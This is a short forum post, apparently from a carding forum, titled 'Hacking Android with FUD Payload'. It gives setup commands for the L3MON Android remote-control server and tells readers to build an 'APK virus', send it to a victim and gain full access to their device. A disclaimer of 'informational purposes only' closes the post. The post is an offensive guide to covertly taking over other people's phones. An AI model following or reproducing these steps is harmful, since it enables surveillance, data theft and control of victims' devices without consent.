Hacking Android with FUD Payload

CarderPlanet

Professional
Messages
2,555
Reputation
7
Reaction score
592
Points
83
In this post, we will share a cloud-based Android remote control package called "L3MON". L3MON is a cloud-based Android remote control package.

Installation
Code:
$ apt install nodejs npm
$ npm install pm2 -g
$ git clone https://github.com/D3VL/L3MON.git

Usage
Code:
$ cd L3MON
$ cd server
$ npm install
$ npm audit fix
$ pm2 start index.js
$ pm2 startup

Now you need to change the password to encrypt the MD5 hash and place it in the config file to protect the admin panel. You can change the password according to the command below.
Code:
$ echo -n "12345" | md5sum
$ nano maindb.json

Run localhost on your browser and enter the username "admin" and the password "12345". Create an APK virus and send it to the victim. After the victim starts your virus, your device with all access functions will appear on your localhost. More details can be found at the link.

Strictly for informational purposes only ✌️

e.jpg
 
Top